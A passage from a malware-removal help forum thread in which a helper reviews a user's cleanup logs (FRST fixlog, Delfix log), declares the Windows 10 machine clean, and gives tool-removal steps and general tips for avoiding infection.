Running from C:\Users\Ryan\Desktop
Loaded Profiles: Ryan (Available Profiles: Ryan)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
Start
CreateRestorePoint:
C:\Users\Ryan\AppData\Local\Microsoft\Performance\Monitor\temp\tmp16CC.exe
C:\Users\Ryan\AppData\Local\Microsoft\Performance\Monitor\temp\tmpF187.exe
C:\Users\Ryan\Downloads\[]Microsoft Office Professional Plus (x64) 2013 Incl Activator P2P\Microsoft Toolkit.exe
Emptytemp:
End
*****************
 
Restore point was successfully created.
"C:\Users\Ryan\AppData\Local\Microsoft\Performance\Monitor\temp\tmp16CC.exe" => not found.
"C:\Users\Ryan\AppData\Local\Microsoft\Performance\Monitor\temp\tmpF187.exe" => not found.
"C:\Users\Ryan\Downloads\[]Microsoft Office Professional Plus (x64) 2013 Incl Activator P2P\Microsoft Toolkit.exe" => not found.
 
=========== EmptyTemp: ==========
 
BITS transfer queue => 569801 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 6448422 B
Java, Flash, Steam htmlcache => 1703 B
Windows/system/drivers => 139456 B
Edge => 0 B
Chrome => 141551779 B
Firefox => 0 B
Opera => 0 B
 
Temp, IE cache, history, cookies, recent:
Default => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 111 B
systemprofile32 => 128 B
LocalService => 1634 B
NetworkService => 0 B
Ryan => 351643172 B
 
RecycleBin => 0 B
EmptyTemp: => 477.2 MB temporary data Removed.
 
================================
 
 
The system needed a reboot.
 
==== End of Fixlog 13:30:31 ====

  • 0

#29
pystryker

pystryker

    Trusted Helper

  • Malware Removal
  • 3,886 posts
Hello :)

Looks like a clean bill of health. :thumbsup: Let's remove my tools and create a new, clean restore point on the machine. I also have some information to help avoid infection in the future.


Step 1: Tool Removal with Delfix and Creation of a clean restore point
  • Download Delfix from here
  • Ensure Remove disinfection tools is ticked
    Also tick:
    • Create registry backup
    • Purge system restore
    • Reset System Settings
    delfix.jpg
  • Click Run
The program will run for a few moments and then notepad will open with a log. Please paste the log in your next reply.
  • You can uninstall ESET Online Scanner at this time.
  • I recommend keeping Malwarebytes Anti-Malware installed. Make sure to update it and run it at least once a week. If it finds things such as PUP's (Potentially Unwanted Programs) you can delete those with no worries. However, if it finds something like a trojan, come see us.
Step 2: Tips, Information, and Optional Installation of Unchecky
  • Watch what you open in your emails. If you get an email from an unknown source with any attached files, do not open it.
  • Install and keep only one anti-virus on your machine. Update it and scan your machine with it at least once a week.
  • Be careful of the websites you visit.
  • When installing new programs, don't be "click happy" and click through the screens. Many programs come with adware in them and are set to install them by default. Several programs require that you uncheck or select no to prevent the installation. Take your time and read each screen as you go. :)
To help protect yourself while on the web, I recommend you read How did I get infected in the first place?

I also recommend reading Miekiemoes Protection Tips


Installation of Unchecky

This is a very good little program that will automatically uncheck any boxes during a software installation. This helps prevent the software from installing any malware that is by default checked while the program is being installed.
  • Click here to be taken to Unchecky.com
  • Click the very large Download button.
  • Click Save
  • Once downloaded, double click the program (Vista, Win 7, and 8, right click and Run as Administrator)
  • Once open, click the Install button.
unchecky1_zps667e512d.jpg


Then click Finish

unchecky2_zpsca4e7d0d.jpg


Unchecky is now installed and will help you keep unwanted check boxes unchecked. :thumbsup:


Things I need to see in your next post

Delfix Log

  • 0

#30
rlives16

rlives16

    Member

  • Topic Starter
  • Member
  • PipPip
  • 34 posts
# DelFix v1.010 - Logfile created 30/08/2016 at 23:50:51
# Updated 26/04/2015 by Xplode
# Username : Ryan - DESKTOP-A6RCKOD
# Operating System : Windows 10 Home  (64 bits)
 
~ Removing disinfection tools ...
 
Deleted : C:\FRST
Deleted : C:\AdwCleaner
Deleted : C:\Users\Ryan\Downloads\FRST-OlderVersion
Deleted : C:\Users\Ryan\Desktop\FRST-OlderVersion
Deleted : C:\Users\Ryan\Desktop\Addition.txt
Deleted : C:\Users\Ryan\Desktop\Fixlog.txt
Deleted : C:\Users\Ryan\Desktop\FRST.txt
Deleted : C:\Users\Ryan\Desktop\FRST64.exe
Deleted : C:\Users\Ryan\Desktop\JRT.txt
Deleted : C:\Users\Ryan\Downloads\Addition.txt
Deleted : C:\Users\Ryan\Downloads\AdwCleaner.exe
Deleted : C:\Users\Ryan\Downloads\CKScanner.exe
Deleted : C:\Users\Ryan\Downloads\FRST.txt
Deleted : C:\Users\Ryan\Downloads\JRT (1).exe
Deleted : C:\Users\Ryan\Downloads\JRT (2).exe
Deleted : C:\Users\Ryan\Downloads\JRT.exe
Deleted : C:\Users\Ryan\Downloads\SecurityCheck.exe
 
~ Creating registry backup ... OK
 
~ Cleaning system restore ...
 
Deleted : RP #7 [Removed Microsoft Office Professional Plus 2013 | 08/27/2016 02:26:12]
Deleted : RP #8 [PROPLUS | 08/27/2016 02:27:03]
Deleted : RP #9 [JRT Pre-Junkware Removal | 08/27/2016 07:55:09]
Deleted : RP #11 [Restore Point Created by FRST | 08/30/2016 17:28:25]
 
New restore point created !
 
~ Resetting system settings ... OK
 
########## - EOF - ##########

  • 0






Similar Topics

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP